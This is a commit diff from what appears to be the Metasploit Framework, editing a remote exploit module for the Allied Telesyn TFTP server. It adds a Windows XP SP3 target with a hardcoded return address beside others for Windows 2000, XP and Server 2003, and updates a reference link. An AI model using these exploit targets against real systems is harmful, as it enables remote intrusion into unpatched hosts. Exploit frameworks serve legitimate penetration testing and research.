adds Windows XP SP3 target and updates the reference link
git-svn-id: file:///home/svn/framework3/trunk@12873 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
b9e398c706
commit
e2820918ad
|
@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
['OSVDB', '11350'],
|
||||
['BID', '21320'],
|
||||
['URL','http://milw0rm.com/exploits/2887'],
|
||||
['URL', 'ftp://guest:guest@ftp.alliedtelesyn.co.uk/pub/utilities/at-tftpd.exe'],
|
||||
['URL', 'ftp://guest:guest@ftp.alliedtelesyn.co.uk/pub/utilities/at-tftpd19.zip'],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
|
@ -55,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'Windows 2000 SP4 English', { 'Ret' => 0x75031dce } ],
|
||||
[ 'Windows XP SP0/1 English', { 'Ret' => 0x71ab7bfb } ],
|
||||
[ 'Windows XP SP2 English', { 'Ret' => 0x71ab9372 } ],
|
||||
[ 'Windows XP SP3 English', { 'Ret' => 0x7e429353 } ], # ret by c0re
|
||||
[ 'Windows Server 2003', { 'Ret' => 0x7c86fed3 } ], # ret donated by securityxxxpert
|
||||
[ 'Windows Server 2003 SP2', { 'Ret' => 0x7c86a01b } ], # ret donated by Polar Bear
|
||||
],
|
||||
|
|
Loading…
Reference in New Issue